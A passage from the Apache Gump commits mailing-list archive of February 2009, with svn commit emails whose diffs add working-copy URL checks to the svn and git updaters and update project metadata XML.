cmd.addParameter('--quiet') - - if forUpdate: - cmd.addParameter('update') - else: - cmd.addParameter('checkout', url) - - # - # Request non-interactive - # - cmd.addParameter('--non-interactive') - - # Optional username/password - if repository.hasUser(): - cmd.addParameter('--username', repository.getUser()) - if repository.hasPassword(): - cmd.addParameter('--password', repository.getPassword()) - - # - # If module name != SVN directory, tell SVN to put it into - # a directory named after our module - # - if not module.getScm().hasDir() or \ - not module.getScm().getDir() == module.getName(): - cmd.addParameter(module.getName()) - - return cmd From [email protected] Tue Feb 24 04:24:39 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 93862 invoked from network); 24 Feb 2009 04:24:39 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 24 Feb 2009 04:24:39 -0000 Received: (qmail 21438 invoked by uid 500); 24 Feb 2009 04:24:38 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 21429 invoked by uid 99); 24 Feb 2009 04:24:38 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 23 Feb 2009 20:24:38 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 24 Feb 2009 04:24:36 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id D564B238885D; Tue, 24 Feb 2009 04:24:15 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r747273 - /gump/trunk/python/gump/core/update/scmupdater.py Date: Tue, 24 Feb 2009 04:24:15 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Tue Feb 24 04:24:15 2009 New Revision: 747273 URL: http://svn.apache.org/viewvc?rev=747273&view=rev Log: Provide infrastructure for updaters to signal a working copy that doesn't match the expected definition Modified: gump/trunk/python/gump/core/update/scmupdater.py Modified: gump/trunk/python/gump/core/update/scmupdater.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/core/update/scmupdater.py?rev=747273&r1=747272&r2=747273&view=diff ============================================================================== --- gump/trunk/python/gump/core/update/scmupdater.py (original) +++ gump/trunk/python/gump/core/update/scmupdater.py Tue Feb 24 04:24:15 2009 @@ -7,9 +7,9 @@ # The ASF licenses this file to You under the Apache License, Version 2.0 # (the "License"); you may not use this file except in compliance with # the License. You may obtain a copy of the License at -# +# # http://www.apache.org/licenses/LICENSE-2.0 -# +# # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. @@ -23,6 +23,7 @@ from gump.core.model.workspace import CommandWorkItem, execute, \ REASON_UPDATE_FAILED, STATE_FAILED, STATE_SUCCESS, WORK_TYPE_UPDATE from gump.core.run.gumprun import RunSpecific +from gump.util.tools import wipeDirectoryTree def should_be_quiet(module): """ @@ -41,10 +42,10 @@ class ScmUpdater(RunSpecific): """ Base class for a SCM specific updaters. - + Provides helpers and template method implementations. """ - + def __init__(self, run): RunSpecific.__init__(self, run) @@ -71,7 +72,7 @@ log.info('Perform ' + module.getScm().getScmType().displayName + \ ' Checkout/Update on #[' + `module.getPosition()` + \ '] : ' + module.getName()) - + (cmd, isUpdate) = self.getCommandAndType(module) if cmd: @@ -86,25 +87,25 @@ ", Repository Name: " + \ module.repository.getName()) - # Execute the command and capture results + # Execute the command and capture results cmdResult = execute(cmd, module.getWorkspace().tmpdir) - + # Store this as work, on both the module and (cloned) on the repo work = CommandWorkItem(WORK_TYPE_UPDATE, cmd, cmdResult) module.performedWork(work) module.repository.performedWork(work.clone()) - - # Update Context w/ Results - if not cmdResult.isOk(): - log.error('Failed to checkout/update module: ' + module.name) + + # Update Context w/ Results + if not cmdResult.isOk(): + log.error('Failed to checkout/update module: ' + module.name) module.changeState(STATE_FAILED, REASON_UPDATE_FAILED) else: - module.changeState(STATE_SUCCESS) + module.changeState(STATE_SUCCESS) return module.okToPerformWork() log.error("Don't know how to to checkout/update module: " + \ - module.name) + module.name) module.changeState(STATE_FAILED, REASON_UPDATE_FAILED) return False @@ -116,11 +117,24 @@ """ Checks whether an update or a fresh checkout is needed and returns a command to perform the required action. - + Returns a tuple (command, isUpdate) """ exists = os.path.exists(module.getSourceControlStagingDirectory()) + if exists: + (matches, reason) = self.workspaceMatchesModule(module) + if not matches: + msg = 'The working copy \'' + \ + module.getSourceControlStagingDirectory() + \ + '\' doesn\'t match the module definition, reason: \'' + \ + reason + '\'. Removing it.' + log.warn(msg) + module.addWarning(msg) + wipeDirectoryTree(module.getSourceControlStagingDirectory(), + False) + exists = False + cmd = None if exists: cmd = self.getUpdateCommand(module) @@ -145,3 +159,17 @@ """ return None + + def workspaceMatchesModule(self, module): + """ + Whether the working copy matches what the updater expects it to + be - like being a working copy of the module's svn URL or + CVS Root etc. + + Must return a tuple (matches, reason) with a bool indicating + whether the workspace matches the module defintion and a reason + string if it doesn't. + + This base implementation returns (True, '') + """ + return (True, '') From [email protected] Tue Feb 24 09:57:44 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 45049 invoked from network); 24 Feb 2009 09:57:44 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 24 Feb 2009 09:57:44 -0000 Received: (qmail 43006 invoked by uid 500); 24 Feb 2009 09:57:44 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 42997 invoked by uid 99); 24 Feb 2009 09:57:44 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 24 Feb 2009 01:57:44 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 24 Feb 2009 09:57:42 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 5EB6523888A5; Tue, 24 Feb 2009 09:57:21 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r747320 - in /gump/metadata/testbase: ant.xml profile.xml xml-xerces2.xml Date: Tue, 24 Feb 2009 09:57:21 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Tue Feb 24 09:57:20 2009 New Revision: 747320 URL: http://svn.apache.org/viewvc?rev=747320&view=rev Log: start consolidating ASF repos Modified: gump/metadata/testbase/ant.xml gump/metadata/testbase/profile.xml gump/metadata/testbase/xml-xerces2.xml Modified: gump/metadata/testbase/ant.xml URL: http://svn.apache.org/viewvc/gump/metadata/testbase/ant.xml?rev=747320&r1=747319&r2=747320&view=diff ============================================================================== --- gump/metadata/testbase/ant.xml (original) +++ gump/metadata/testbase/ant.xml Tue Feb 24 09:57:20 2009 @@ -22,7 +22,7 @@ Java based build tool </description> - <svn repository="ant" dir="core/trunk"/> + <svn repository="asf" dir="ant/core/trunk"/> <project name="bootstrap-ant"> <script name="bootstrap"/> Modified: gump/metadata/testbase/profile.xml URL: http://svn.apache.org/viewvc/gump/metadata/testbase/profile.xml?rev=747320&r1=747319&r2=747320&view=diff ============================================================================== --- gump/metadata/testbase/profile.xml (original) +++ gump/metadata/testbase/profile.xml Tue Feb 24 09:57:20 2009 @@ -32,14 +32,13 @@ <module href="testbase/xml-xerces2.xml"/> <module href="testbase/junit.xml"/> - <repository href="repository/ant.xml"/> <repository href="repository/apr.xml"/> + <repository href="repository/asf.xml"/> <repository href="repository/excalibur-svn.xml"/> <repository href="repository/jakarta-svn.xml"/> <repository href="repository/junit.xml"/> <repository href="repository/logging.xml"/> <repository href="repository/sourceforge.xml"/> - <repository href="repository/xerces.xml"/> <repository href="repository/xml-svn.xml"/> <project name="jaxp" package="jaxp-1_3"/> Modified: gump/metadata/testbase/xml-xerces2.xml URL: http://svn.apache.org/viewvc/gump/metadata/testbase/xml-xerces2.xml?rev=747320&r1=747319&r2=747320&view=diff ============================================================================== --- gump/metadata/testbase/xml-xerces2.xml (original) +++ gump/metadata/testbase/xml-xerces2.xml Tue Feb 24 09:57:20 2009 @@ -22,7 +22,7 @@ Java XML Parser - the sequel with no equal </description> - <svn repository="xerces" dir="java/trunk"/> + <svn repository="asf" dir="xerces/java/trunk"/> <project name="xml-xerces"> <package>org.apache.xerces</package> From [email protected] Tue Feb 24 19:18:04 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 28629 invoked from network); 24 Feb 2009 19:18:03 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 24 Feb 2009 19:18:03 -0000 Received: (qmail 75230 invoked by uid 500); 24 Feb 2009 19:18:03 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 75221 invoked by uid 99); 24 Feb 2009 19:18:03 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 24 Feb 2009 11:18:03 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 24 Feb 2009 19:18:01 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 22CAE23888A0; Tue, 24 Feb 2009 19:17:40 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r747511 - /gump/metadata/project/httpcomponents.xml Date: Tue, 24 Feb 2009 19:17:39 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: olegk Date: Tue Feb 24 19:17:39 2009 New Revision: 747511 URL: http://svn.apache.org/viewvc?rev=747511&view=rev Log: Upgraded HttpCore version to 4.1-SNAPSHOT Modified: gump/metadata/project/httpcomponents.xml Modified: gump/metadata/project/httpcomponents.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/httpcomponents.xml?rev=747511&r1=747510&r2=747511&view=diff ============================================================================== --- gump/metadata/project/httpcomponents.xml (original) +++ gump/metadata/project/httpcomponents.xml Tue Feb 24 19:17:39 2009 @@ -49,10 +49,10 @@ <home nested="httpcore" /> <jar id="module-main" - name="module-main/target/httpcore-4.0.jar" + name="module-main/target/httpcore-4.1-SNAPSHOT.jar" /> <jar id="module-nio" - name="module-nio/target/httpcore-nio-4.0.jar" + name="module-nio/target/httpcore-nio-4.1-SNAPSHOT.jar" /> <!-- tests are not supposed to be run in this project, but they are... --> From [email protected] Wed Feb 25 04:53:10 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 88400 invoked from network); 25 Feb 2009 04:53:09 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 25 Feb 2009 04:53:09 -0000 Received: (qmail 33379 invoked by uid 500); 25 Feb 2009 04:53:09 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 33370 invoked by uid 99); 25 Feb 2009 04:53:09 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 24 Feb 2009 20:53:09 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 25 Feb 2009 04:53:07 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id C1B9F23888CA; Wed, 25 Feb 2009 04:52:46 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r747655 - /gump/metadata/project/rat.xml Date: Wed, 25 Feb 2009 04:52:46 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Wed Feb 25 04:52:45 2009 New Revision: 747655 URL: http://svn.apache.org/viewvc?rev=747655&view=rev Log: moved in svn Modified: gump/metadata/project/rat.xml Modified: gump/metadata/project/rat.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/rat.xml?rev=747655&r1=747654&r2=747655&view=diff ============================================================================== --- gump/metadata/project/rat.xml (original) +++ gump/metadata/project/rat.xml Wed Feb 25 04:52:45 2009 @@ -22,7 +22,7 @@ Release Audit Tool </description> - <svn repository="apache-incubator-svn" dir="rat/main/trunk/rat"/> + <svn repository="apache-incubator-svn" dir="rat/main/trunk"/> <project name="rat"> <package>org.apache.rat</package> From [email protected] Wed Feb 25 04:54:39 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 88549 invoked from network); 25 Feb 2009 04:54:39 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 25 Feb 2009 04:54:39 -0000 Received: (qmail 33497 invoked by uid 500); 25 Feb 2009 04:54:39 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 33488 invoked by uid 99); 25 Feb 2009 04:54:39 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 24 Feb 2009 20:54:39 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 25 Feb 2009 04:54:38 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 8A8D723888CA; Wed, 25 Feb 2009 04:54:18 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r747656 - in /gump/trunk/python/gump/core/update: scmupdater.py svn.py Date: Wed, 25 Feb 2009 04:54:17 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Wed Feb 25 04:54:17 2009 New Revision: 747656 URL: http://svn.apache.org/viewvc?rev=747656&view=rev Log: Make svn detect a bad working copy Modified: gump/trunk/python/gump/core/update/scmupdater.py gump/trunk/python/gump/core/update/svn.py Modified: gump/trunk/python/gump/core/update/scmupdater.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/core/update/scmupdater.py?rev=747656&r1=747655&r2=747656&view=diff ============================================================================== --- gump/trunk/python/gump/core/update/scmupdater.py (original) +++ gump/trunk/python/gump/core/update/scmupdater.py Wed Feb 25 04:54:17 2009 @@ -20,9 +20,10 @@ from gump import log -from gump.core.model.workspace import CommandWorkItem, execute, \ +from gump.core.model.workspace import CommandWorkItem, \ REASON_UPDATE_FAILED, STATE_FAILED, STATE_SUCCESS, WORK_TYPE_UPDATE from gump.core.run.gumprun import RunSpecific +from gump.util.process.launcher import execute from gump.util.tools import wipeDirectoryTree def should_be_quiet(module): Modified: gump/trunk/python/gump/core/update/svn.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/core/update/svn.py?rev=747656&r1=747655&r2=747656&view=diff ============================================================================== --- gump/trunk/python/gump/core/update/svn.py (original) +++ gump/trunk/python/gump/core/update/svn.py Wed Feb 25 04:54:17 2009 @@ -16,9 +16,14 @@ # See the License for the specific language governing permissions and # limitations under the License. +import re +import StringIO + from gump import log -from gump.core.model.workspace import Cmd from gump.core.update.scmupdater import ScmUpdater, should_be_quiet +from gump.util.process.command import Cmd +from gump.util.process.launcher import execute +from gump.util.tools import catFile def getCommand(module, forUpdate): """ @@ -68,6 +73,8 @@ return cmd +URL_REGEX = re.compile('^URL:\s+(.*)\s*$', re.MULTILINE | re.UNICODE) + ############################################################################### # Classes ############################################################################### @@ -93,3 +100,35 @@ """ return getCommand(module, True) + def workspaceMatchesModule(self, module): + """ + Run svn info to see whether the URL matches + """ + cmd = Cmd('svn', 'check_workspace_' + module.getName(), + module.getSourceControlStagingDirectory()) + cmd.addParameter('info') + + result = execute(cmd) + + output = None + if result.hasOutput(): + stream = StringIO.StringIO() + catFile(stream, result.getOutput()) + output = stream.getvalue() + stream.close() + + if not result.isOk(): + return (False, 'svn info returned ' + str(result.exit_code)) + + elif not output: + return (False, 'svn info didn\'t return any output.') + + match = URL_REGEX.search(output) + if not match: + return (False, 'Couldn\'t find URL in svn info output ' + output) + + expectedURL = module.getScm().getRootUrl() + actualURL = match.group(1) + + return (expectedURL == actualURL, 'Expected URL \'' + expectedURL + \ + '\' but working copy was \'' + actualURL + '\'') From [email protected] Thu Feb 26 04:38:38 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 41292 invoked from network); 26 Feb 2009 04:38:38 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 26 Feb 2009 04:38:38 -0000 Received: (qmail 423 invoked by uid 500); 26 Feb 2009 04:38:38 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 414 invoked by uid 99); 26 Feb 2009 04:38:38 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 25 Feb 2009 20:38:38 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 26 Feb 2009 04:38:37 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 05941238898B; Thu, 26 Feb 2009 04:38:17 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r748010 - /gump/trunk/python/gump/core/update/git.py Date: Thu, 26 Feb 2009 04:38:16 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Thu Feb 26 04:38:16 2009 New Revision: 748010 URL: http://svn.apache.org/viewvc?rev=748010&view=rev Log: make git detect "bad" working copies Modified: gump/trunk/python/gump/core/update/git.py Modified: gump/trunk/python/gump/core/update/git.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/core/update/git.py?rev=748010&r1=748009&r2=748010&view=diff ============================================================================== --- gump/trunk/python/gump/core/update/git.py (original) +++ gump/trunk/python/gump/core/update/git.py Thu Feb 26 04:38:16 2009 @@ -17,8 +17,10 @@ # limitations under the License. from gump import log -from gump.core.model.workspace import Cmd from gump.core.update.scmupdater import ScmUpdater, should_be_quiet +from gump.util.process.command import Cmd +from gump.util.process.launcher import execute +from gump.util.tools import tailFileToString def log_repository_and_url(module): repository = module.repository @@ -65,3 +67,29 @@ module.getSourceControlStagingDirectory()) maybe_make_quiet(module, cmd) return cmd + + def workspaceMatchesModule(self, module): + """ + Run git config remote.origin.url to see whether the URL matches + """ + cmd = Cmd('git', 'check_workspace_' + module.getName(), + module.getSourceControlStagingDirectory()) + cmd.addParameter('config') + cmd.addParameter('remote.origin.url') + + result = execute(cmd) + + output = None + if result.hasOutput(): + output = tailFileToString(result.getOutput(), 1).rstrip() + + if not result.isOk(): + return (False, 'git config returned ' + str(result.exit_code)) + + elif not output: + return (False, 'git config didn\'t return any output.') + + expectedURL = module.getScm().getRootUrl() + + return (expectedURL == output, 'Expected URL \'' + expectedURL + \ + '\' but working copy was \'' + output + '\'') From [email protected] Thu Feb 26 04:39:49 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 41394 invoked from network); 26 Feb 2009 04:39:48 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 26 Feb 2009 04:39:48 -0000 Received: (qmail 2858 invoked by uid 500); 26 Feb 2009 04:39:46 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 2847 invoked by uid 99); 26 Feb 2009 04:39:46 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 25 Feb 2009 20:39:46 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 26 Feb 2009 04:39:45 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id DD641238898B; Thu, 26 Feb 2009 04:39:25 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r748012 - /gump/metadata/testbase/ant.xml Date: Thu, 26 Feb 2009 04:39:25 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Thu Feb 26 04:39:25 2009 New Revision: 748012 URL: http://svn.apache.org/viewvc?rev=748012&view=rev Log: add a test with a trailing slash at svn URL Modified: gump/metadata/testbase/ant.xml Modified: gump/metadata/testbase/ant.xml URL: http://svn.apache.org/viewvc/gump/metadata/testbase/ant.xml?rev=748012&r1=748011&r2=748012&view=diff ============================================================================== --- gump/metadata/testbase/ant.xml (original) +++ gump/metadata/testbase/ant.xml Thu Feb 26 04:39:25 2009 @@ -22,7 +22,7 @@ Java based build tool </description> - <svn repository="asf" dir="ant/core/trunk"/> + <svn repository="asf" dir="ant/core/trunk/"/> <project name="bootstrap-ant"> <script name="bootstrap"/> From [email protected] Thu Feb 26 05:05:53 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 49319 invoked from network); 26 Feb 2009 05:05:53 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 26 Feb 2009 05:05:53 -0000 Received: (qmail 15024 invoked by uid 500); 26 Feb 2009 05:05:53 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 15015 invoked by uid 99); 26 Feb 2009 05:05:53 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 25 Feb 2009 21:05:53 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 26 Feb 2009 05:05:52 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 76586238898B; Thu, 26 Feb 2009 05:05:32 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r748018 - /gump/trunk/python/gump/core/update/svn.py Date: Thu, 26 Feb 2009 05:05:31 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Thu Feb 26 05:05:31 2009 New Revision: 748018 URL: http://svn.apache.org/viewvc?rev=748018&view=rev Log: 'svn info' strips trailing slashes from the checked out URL, don't expect it to be there Modified: gump/trunk/python/gump/core/update/svn.py Modified: gump/trunk/python/gump/core/update/svn.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/core/update/svn.py?rev=748018&r1=748017&r2=748018&view=diff ============================================================================== --- gump/trunk/python/gump/core/update/svn.py (original) +++ gump/trunk/python/gump/core/update/svn.py Thu Feb 26 05:05:31 2009 @@ -127,7 +127,7 @@ if not match: return (False, 'Couldn\'t find URL in svn info output ' + output) - expectedURL = module.getScm().getRootUrl() + expectedURL = module.getScm().getRootUrl().rstrip('/') actualURL = match.group(1) return (expectedURL == actualURL, 'Expected URL \'' + expectedURL + \ From [email protected] Thu Feb 26 06:06:55 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 86156 invoked from network); 26 Feb 2009 06:06:55 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 26 Feb 2009 06:06:55 -0000 Received: (qmail 65084 invoked by uid 500); 26 Feb 2009 06:06:55 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 65075 invoked by uid 99); 26 Feb 2009 06:06:55 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 25 Feb 2009 22:06:55 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 26 Feb 2009 06:06:53 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 0323523888A5; Thu, 26 Feb 2009 06:06:32 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r748028 - in /gump/trunk/python/gump: core/update/git.py core/update/scmupdater.py core/update/svn.py util/process/command.py Date: Thu, 26 Feb 2009 06:06:31 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Thu Feb 26 06:06:31 2009 New Revision: 748028 URL: http://svn.apache.org/viewvc?rev=748028&view=rev Log: extract common logic from svn and git updaters Modified: gump/trunk/python/gump/core/update/git.py gump/trunk/python/gump/core/update/scmupdater.py gump/trunk/python/gump/core/update/svn.py gump/trunk/python/gump/util/process/command.py Modified: gump/trunk/python/gump/core/update/git.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/core/update/git.py?rev=748028&r1=748027&r2=748028&view=diff ============================================================================== --- gump/trunk/python/gump/core/update/git.py (original) +++ gump/trunk/python/gump/core/update/git.py Thu Feb 26 06:06:31 2009 @@ -17,9 +17,9 @@ # limitations under the License. from gump import log -from gump.core.update.scmupdater import ScmUpdater, should_be_quiet +from gump.core.update.scmupdater import match_workspace_template, ScmUpdater, \ + should_be_quiet from gump.util.process.command import Cmd -from gump.util.process.launcher import execute from gump.util.tools import tailFileToString def log_repository_and_url(module): @@ -72,24 +72,7 @@ """ Run git config remote.origin.url to see whether the URL matches """ - cmd = Cmd('git', 'check_workspace_' + module.getName(), - module.getSourceControlStagingDirectory()) - cmd.addParameter('config') - cmd.addParameter('remote.origin.url') - - result = execute(cmd) - - output = None - if result.hasOutput(): - output = tailFileToString(result.getOutput(), 1).rstrip() - - if not result.isOk(): - return (False, 'git config returned ' + str(result.exit_code)) - - elif not output: - return (False, 'git config didn\'t return any output.') - - expectedURL = module.getScm().getRootUrl() - - return (expectedURL == output, 'Expected URL \'' + expectedURL + \ - '\' but working copy was \'' + output + '\'') + return match_workspace_template(module, 'git config remote.origin.url', + lambda result: + tailFileToString(result.getOutput(), + 1).rstrip()) Modified: gump/trunk/python/gump/core/update/scmupdater.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/core/update/scmupdater.py?rev=748028&r1=748027&r2=748028&view=diff ============================================================================== --- 